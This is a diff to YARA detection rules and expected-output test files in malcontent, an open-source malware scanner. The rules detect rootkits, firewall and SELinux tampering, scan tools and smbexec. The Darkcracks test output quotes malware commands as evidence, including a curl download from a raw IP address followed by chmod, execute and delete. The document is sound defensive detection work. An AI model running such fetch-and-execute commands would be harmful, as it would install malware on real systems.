"2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed" - hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f" - filetypes = "elf,so" - description = "references both SELinux and iptables/firewalld" - - strings: - $selinux = /SELINUX[=\w]{0,32}/ fullword - $f_iptables = /iptables[ -\w]{0,32}/ - $f_firewalld = /[\w ]{0,32}firewalld/ - $not_ip6tables = "NFTNL_RULE_TABLE" - $not_iptables = "iptables-restore" - $not_iptables_nft = "iptables-nft" - $not_selinux_init = "SELINUX_INIT" - $not_define = "#define" fullword - $not_netlink = "NETLINK" fullword - - condition: - filesize < 1MB and $selinux and any of ($f*) and none of ($not*) -} diff --git a/rules/impact/degrade/ufw.yara b/rules/impact/degrade/ufw.yara deleted file mode 100644 index 113440907..000000000 --- a/rules/impact/degrade/ufw.yara +++ /dev/null @@ -1,24 +0,0 @@ -import "math" - -private rule ufw_tool { - strings: - $not_route = "route-insert" - $not_statusverbose = "statusverbose" - $not_enables_the = "enables the" - $not_enable_the = "enable the" - $not_enable = "ufw enable" - - condition: - filesize < 256KB and any of them -} - -rule ufw_disable_word: high { - meta: - description = "disables ufw firewall" - - strings: - $ref = /ufw['", ]{1,4}disable/ fullword - - condition: - filesize < 256KB and $ref and not ufw_tool -} diff --git a/rules/impact/rootkit/readdir-interceptor.yara b/rules/impact/rootkit/readdir-interceptor.yara deleted file mode 100644 index 63864c70a..000000000 --- a/rules/impact/rootkit/readdir-interceptor.yara +++ /dev/null @@ -1,65 +0,0 @@ -rule readdir_intercept: high { - meta: - description = "userland rootkit designed to hide files (readdir64)" - hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116" - hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71" - hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586" - filetypes = "so,c" - - strings: - $r_new65 = "readdir64" fullword - $r_old64 = "_readdir64" - $r_new32 = "readdir" fullword - $r_old32 = "_readdir" - $not_ld_debug = "LD_DEBUG" - $not_libc = "getusershell" - - condition: - filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) and none of ($not*) -} - -rule readdir_tcp_wrapper_intercept: high { - meta: - description = "userland rootkit designed to hide files and bypass tcp-wrappers" - ref = "https://github.com/ldpreload/Medusa" - filetypes = "so,c" - - strings: - $r_new65 = "readdir64" fullword - $r_old64 = "_readdir64" - $r_new32 = "readdir" fullword - $r_old32 = "_readdir" - $r_hosts_access = "hosts_access" - - condition: - filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) -} - -rule readdir_intercept_source: high { - meta: - description = "userland rootkit source designed to hide files (DECLARE_READDIR)" - filetypes = "so,c" - - strings: - $declare = "DECLARE_READDIR" - $hide = "hide" - - condition: - filesize < 200KB and all of them -} - -rule lkm_dirent: high { - meta: - description = "kernel rootkit designed to hide files (linux_dirent)" - hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" - filetypes = "so" - - strings: - $l_dirent = "linux_dirent" - $linux = "Linux" - $not_syscalls = "#define _LINUX_SYSCALLS_H" - $not_itimer = "__kernel_old_itimerval" - - condition: - filesize < 2MB and all of ($l*) and none of ($not*) -} diff --git a/rules/lateral/scan/scan_tool.yara b/rules/lateral/scan/scan_tool.yara index eb3018d43..71e3b684a 100644 --- a/rules/lateral/scan/scan_tool.yara +++ b/rules/lateral/scan/scan_tool.yara @@ -6,7 +6,7 @@ rule generic_scan_tool: medium { hash_2023_Linux_Malware_Samples_00ae = "00ae07c9fe63b080181b8a6d59c6b3b6f9913938858829e5a42ab90fb72edf7a" strings: - $f_gethostbyname = "gethostbyname" + // $f_gethostbyname = "gethostbyname" $f_socket = "socket" $f_connect = "connect" $o_banner = "banner" @@ -15,6 +15,7 @@ rule generic_scan_tool: medium { $o_scan = "scan" $o_port = "port" $o_target = "target" + $o_ip = "%d.%d.%d.%d" $not_nss = "NSS_USE_SHEXP_IN_CERT_NAME" $not_microsoft = "Microsoft Corporation" $not_php_reference = "ftp_nb_put" @@ -22,3 +23,15 @@ rule generic_scan_tool: medium { condition: all of ($f*) and 2 of ($o*) and none of ($not*) } + +rule root_scan_tool: high { + meta: + description = "may try to get root on other systems" + + strings: + $root_the = /[\w \.]{0,32}root the [\w \.\%]{0,32}/ + $r00t = /[\w \.]{0,32}r00t[\w \.]{0,32}/ + + condition: + filesize < 20MB and generic_scan_tool and any of them +} diff --git a/rules/malware/family/medusa.yara b/rules/malware/family/medusa.yara index 59cae14cf..5701a3647 100644 --- a/rules/malware/family/medusa.yara +++ b/rules/malware/family/medusa.yara @@ -14,7 +14,8 @@ rule medusa: critical linux { $rkload = "rkload" fullword $wcs = "wcsmbsload" fullword $readdir64 = "readdir64" fullword + $backup_ld = "backup_ld" fullword condition: - filesize < 2MB and 80 % of them + filesize < 2MB and all of them } diff --git a/rules/persist/service/install.yara b/rules/persist/service/install.yara new file mode 100644 index 000000000..cc7c79dca --- /dev/null +++ b/rules/persist/service/install.yara @@ -0,0 +1,27 @@ +rule register_service_start: windows medium { + meta: + description = "installs and starts a Windows Service" + + strings: + $s_install = "RegisterServiceCtrlHandlerA" + $s_create = "CreateServiceA" + $s_start = "StartServiceA" + + condition: + filesize < 5MB and all of them +} + +rule register_service_start_high: windows high { + meta: + description = "installs and starts a Windows Service" + + strings: + $s_install = "RegisterServiceCtrlHandlerA" + $s_create = "CreateServiceA" + $s_start = "StartServiceA" + $o_netsh = "netsh" + $o_filter = "SetUnhandledExceptionFilter" + + condition: + filesize < 200KB and all of ($s*) and any of ($o*) +} diff --git a/rules/process/thread_local_storage.yara b/rules/process/thread_local_storage.yara index 493a44223..68f190e9e 100644 --- a/rules/process/thread_local_storage.yara +++ b/rules/process/thread_local_storage.yara @@ -1,6 +1,6 @@ -rule tls_get_addr { +rule tls_get_addr: medium { meta: - description = "Uses glibc thread local storage" + description = "looks up memory addresses for thread local storage or linked libraries" ref = "https://chao-tic.github.io/blog/2018/12/25/tls" strings: diff --git a/rules/sec-tool/pentest/smbexec.yara b/rules/sec-tool/pentest/smbexec.yara new file mode 100644 index 000000000..94a829082 --- /dev/null +++ b/rules/sec-tool/pentest/smbexec.yara @@ -0,0 +1,11 @@ +rule hacktool_smbexec: critical { + meta: + description = "execute commands on remote SMB host" + + strings: + $hash = "user supplied NTLM HASH" + $hash2 = "HASH PASS: Substituting" + + condition: + filesize < 100KB and any of them +} diff --git a/tests/does-nothing/does-nothing.simple b/tests/does-nothing/does-nothing.simple index af4355d54..37c6379a5 100644 --- a/tests/does-nothing/does-nothing.simple +++ b/tests/does-nothing/does-nothing.simple @@ -13,6 +13,7 @@ fs/path/etc: low fs/path/home: medium fs/permission/chown: medium fs/permission/modify: medium +lateral/scan/tool: medium net/socket/receive: low net/socket/send: low persist/daemon: medium diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index 50a5439c3..35179e6ff 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff +++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff @@ -1,6 +1,6 @@ ## Changed: javascript/2024.lottie-player/lottie-player.min.js [🟡 MEDIUM → 😈 CRITICAL] -### 39 new behaviors +### 40 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | |-----------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| @@ -21,6 +21,7 @@ | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [useragent](https://github.com/search?q=useragent&type=code) | | +MEDIUM | **[impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat)** | references a 'heartbeat' | [heartBeatTimeout](https://github.com/search?q=heartBeatTimeout&type=code)
[heartbeat_pulse](https://github.com/search?q=heartbeat_pulse&type=code)
[lastHeartbeatResponse](https://github.com/search?q=lastHeartbeatResponse&type=code)
[updateLastHeartbeat](https://github.com/search?q=updateLastHeartbeat&type=code) | | +MEDIUM | **[impact/resource/bank_xfer](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/resource/bank_xfer.yara#bank_xfer)** | references 'bank transfer' | [bank transfer](https://github.com/search?q=bank+transfer&type=code) | +| +MEDIUM | **[lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool)** | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | +MEDIUM | **[net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload)** | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code) | | +MEDIUM | **[net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post)** | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | +MEDIUM | **[net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket)** | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WalletLinkWebSocket](https://github.com/search?q=WalletLinkWebSocket&type=code)
[WebSocket:gV](https://github.com/search?q=WebSocket%3AgV&type=code)
[WebSocket:typeof](https://github.com/search?q=WebSocket%3Atypeof&type=code)
[WebSocketClass:h](https://github.com/search?q=WebSocketClass%3Ah&type=code)
[WebSocketClass:l](https://github.com/search?q=WebSocketClass%3Al&type=code)
[clearWebSocket](https://github.com/search?q=clearWebSocket&type=code)
[webSocket:e](https://github.com/search?q=webSocket%3Ae&type=code)
[webSocket:r](https://github.com/search?q=webSocket%3Ar&type=code)
[webSocket:t](https://github.com/search?q=webSocket%3At&type=code) | diff --git a/tests/javascript/clean/203.b7219352.chunk.js.simple b/tests/javascript/clean/203.b7219352.chunk.js.simple index 0e5568b9b..a306dedb0 100644 --- a/tests/javascript/clean/203.b7219352.chunk.js.simple +++ b/tests/javascript/clean/203.b7219352.chunk.js.simple @@ -36,6 +36,7 @@ hw/wireless: low impact/degrade/infection: medium impact/remote_access/agent: medium impact/remote_access/heartbeat: medium +lateral/scan/tool: medium net/dns/txt: low net/download: medium net/http/cookies: medium diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index c7776083d..f68825144 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -27,7 +27,7 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/cmd: medium exec/conditional/LANG: low diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index 855e2c16f..842e48d3e 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -28,7 +28,7 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/cmd: medium exec/plugin: low diff --git a/tests/javascript/clean/connection.js.simple b/tests/javascript/clean/connection.js.simple index 04a5d5256..76dcc4f27 100644 --- a/tests/javascript/clean/connection.js.simple +++ b/tests/javascript/clean/connection.js.simple @@ -6,6 +6,7 @@ credential/password: low data/embedded/base64_terms: medium data/embedded/base64_url: medium data/encoding/base64: low +lateral/scan/tool: medium net/dns: low net/socket/send: low net/url/embedded: medium diff --git a/tests/javascript/clean/faker.js.simple b/tests/javascript/clean/faker.js.simple index bb8797a29..a5474ab76 100644 --- a/tests/javascript/clean/faker.js.simple +++ b/tests/javascript/clean/faker.js.simple @@ -14,7 +14,7 @@ data/embedded/base64_url: medium data/encoding/base64: low data/encoding/json_decode: low data/encoding/json_encode: low -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low exec/plugin: low exfil/office_file_ext: medium exfil/stealer/credit_card: medium @@ -26,6 +26,7 @@ fs/path/usr_local: medium fs/path/var: low impact/infection/worm: medium impact/remote_access/trojan: medium +lateral/scan/tool: medium net/download: medium net/http/fake_user_agent: high net/http/form_upload: medium diff --git a/tests/javascript/clean/faker.min.js.simple b/tests/javascript/clean/faker.min.js.simple index 87efb6b7e..d16220b08 100644 --- a/tests/javascript/clean/faker.min.js.simple +++ b/tests/javascript/clean/faker.min.js.simple @@ -9,7 +9,7 @@ data/compression/bzip2: low data/compression/gzip: low data/encoding/json_decode: low data/encoding/json_encode: low -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low exec/plugin: low exfil/office_file_ext: medium exfil/stealer/credit_card: medium @@ -21,6 +21,7 @@ fs/path/usr_local: medium fs/path/var: low impact/infection/worm: medium impact/remote_access/trojan: medium +lateral/scan/tool: medium net/download: medium net/http/fake_user_agent: high net/http/form_upload: medium diff --git a/tests/javascript/clean/frequency_lists.js.simple b/tests/javascript/clean/frequency_lists.js.simple index c3fd38930..6f90669ac 100644 --- a/tests/javascript/clean/frequency_lists.js.simple +++ b/tests/javascript/clean/frequency_lists.js.simple @@ -17,6 +17,7 @@ impact/remote_access/agent: medium impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium +lateral/scan/tool: medium net/download: medium net/ip/multicast_send: low net/ip/spoof: medium diff --git a/tests/javascript/clean/highlight.esm.js.simple b/tests/javascript/clean/highlight.esm.js.simple index 698fc579b..253491788 100644 --- a/tests/javascript/clean/highlight.esm.js.simple +++ b/tests/javascript/clean/highlight.esm.js.simple @@ -20,10 +20,10 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/relative_hidden: low exec/cmd: medium exec/plugin: low exec/program/background: low +exec/program/hidden: low exec/remote_commands/code_eval: medium exec/script/osa: medium exec/shell/SHELL: low diff --git a/tests/javascript/clean/highlight.js.simple b/tests/javascript/clean/highlight.js.simple index f2585167d..9e9e58262 100644 --- a/tests/javascript/clean/highlight.js.simple +++ b/tests/javascript/clean/highlight.js.simple @@ -20,10 +20,10 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/relative_hidden: low exec/cmd: medium exec/plugin: low exec/program/background: low +exec/program/hidden: low exec/remote_commands/code_eval: medium exec/script/osa: medium exec/shell/SHELL: low diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index f70f60b70..0d3f79a79 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple @@ -15,7 +15,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/plugin: low exec/program: medium diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index 020791f13..e929ec3b9 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple +++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -15,7 +15,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/plugin: low exec/program: medium diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index 8a12e2499..18a7d482d 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -13,7 +13,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/plugin: low exec/program: medium diff --git a/tests/javascript/clean/securityDashboards.plugin.js.simple b/tests/javascript/clean/securityDashboards.plugin.js.simple index 726acf13c..171f88260 100644 --- a/tests/javascript/clean/securityDashboards.plugin.js.simple +++ b/tests/javascript/clean/securityDashboards.plugin.js.simple @@ -26,6 +26,7 @@ impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium lateral/scan/brute_force: low +lateral/scan/tool: medium net/download: medium net/http/form_upload: medium net/http/post: medium diff --git a/tests/javascript/clean/zxcvbn.js.simple b/tests/javascript/clean/zxcvbn.js.simple index 6d5f6c344..e44886620 100644 --- a/tests/javascript/clean/zxcvbn.js.simple +++ b/tests/javascript/clean/zxcvbn.js.simple @@ -21,6 +21,7 @@ impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium lateral/scan/brute_force: low +lateral/scan/tool: medium net/download: medium net/ip/multicast_send: low net/ip/spoof: medium diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple index 852001aa1..c66a9ab9b 100644 --- a/tests/linux/2021.FontOnLake/45E9.elf.simple +++ b/tests/linux/2021.FontOnLake/45E9.elf.simple @@ -16,12 +16,13 @@ discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/pam: medium evasion/bypass_security/linux/se: medium -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/proc: high -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low +evasion/file/prefix: medium +evasion/file/prefix/proc: high evasion/logging/acct: low evasion/logging/failed_logins: medium evasion/logging/historical_logins: medium +evasion/rootkit/refs: high exec/program: medium exec/program/background: low exec/shell/SHELL: low @@ -61,8 +62,8 @@ impact/remote_access/backdoor: high impact/remote_access/reverse_shell: medium impact/remote_access/ssh: high impact/rootkit: critical -impact/rootkit/refs: high impact/ui/x11_auth: medium +lateral/scan/tool: medium malware/family/fontonlake: critical net/download: medium net/ip/spoof: medium diff --git a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple index 65d91e761..7602a71ba 100644 --- a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple +++ b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple @@ -19,7 +19,7 @@ discover/system/cpu_info: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low -evasion/hidden_paths/var_run: medium +evasion/file/location/var_run: medium exec/conditional/LANG: low exec/dylib/address_check: low exec/dylib/iterate: low @@ -86,4 +86,4 @@ privesc/sudo: medium process/create: low process/multithreaded: low process/name_set: medium -process/thread_local_storage: low +process/thread_local_storage: medium diff --git a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple index 831775516..4448d98a5 100644 --- a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple +++ b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple @@ -6,7 +6,7 @@ credential/keylogger: medium credential/password: low discover/network/interface_list: medium discover/system/platform: low -evasion/hijack_execution/process_hide: critical +evasion/rootkit/linux_userspace: critical exec/dylib/symbol_address: medium exfil/stealer/pam: high fs/link_read: low diff --git a/tests/linux/2022.bpfdoor/bpfdoor_2.simple b/tests/linux/2022.bpfdoor/bpfdoor_2.simple index 9ca216b9d..80d372626 100644 --- a/tests/linux/2022.bpfdoor/bpfdoor_2.simple +++ b/tests/linux/2022.bpfdoor/bpfdoor_2.simple @@ -1,7 +1,7 @@ # linux/2022.bpfdoor/bpfdoor_2: critical 3P/elastic/bpfdoor: critical credential/sniffer/pcap: high -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low evasion/logging/hide_shell_history: high exec/program: medium exec/program/background: low diff --git a/tests/linux/2022.ez-pwnkit/payload.simple b/tests/linux/2022.ez-pwnkit/payload.simple index 944a8619e..5f6a0a3e8 100644 --- a/tests/linux/2022.ez-pwnkit/payload.simple +++ b/tests/linux/2022.ez-pwnkit/payload.simple @@ -20,6 +20,7 @@ impact/exploit/GCONV_PATH: high impact/exploit/cve: high impact/exploit/pwnkit: critical impact/remote_access/reverse_shell: medium +lateral/scan/tool: medium net/dns: low net/dns/servers: low net/dns/txt: low diff --git a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff index 50848ad7d..6f4d79d1c 100644 --- a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff +++ b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff @@ -15,7 +15,7 @@ +data/embedded/base64_url +data/embedded/pgp_key +data/encoding/base64 -+evasion/hidden_paths/var_tmp ++evasion/file/location/var_tmp +exec/install_additional/add_apt_key +exec/shell/exec +exec/shell/ignore_output diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple index ed250bc6d..7e125dabc 100644 --- a/tests/linux/2023.Kinsing/install.sh.simple +++ b/tests/linux/2023.Kinsing/install.sh.simple @@ -19,10 +19,10 @@ evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/se: medium evasion/bypass_security/linux/se_disable: high evasion/bypass_security/linux/ufw: medium -evasion/covert_location/dev_shm: critical -evasion/hidden_paths/dev_shm: critical -evasion/hidden_paths/hidden: high -evasion/hidden_paths/var_tmp: medium +evasion/file/location/dev_shm: critical +evasion/file/location/var_tmp: medium +evasion/file/prefix: high +evasion/file/prefix/dev: critical evasion/hijack_execution/etc_ld.so.preload: high evasion/logging/syslog: medium evasion/mimicry/fake_process: critical @@ -56,10 +56,9 @@ impact/cryptojacking/cryptonight: high impact/cryptojacking/generic: high impact/cryptojacking/monero_pool: medium impact/cryptojacking/xmrig: high +impact/degrade/firewall: high impact/degrade/infection: critical impact/degrade/linux_paths: high -impact/degrade/selinux_firewall: high -impact/degrade/ufw: high impact/remote_access/agent: medium impact/remote_access/iptables: medium impact/remote_access/kill_rm: medium diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md index 495e7d436..068854e57 100644 --- a/tests/linux/2024.Darkcracks/darkcracks.sh.md +++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md @@ -3,7 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | CRITICAL | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) | -| CRITICAL | [evasion/covert_location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | +| CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | | CRITICAL | [evasion/self_deletion/run_sleep_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
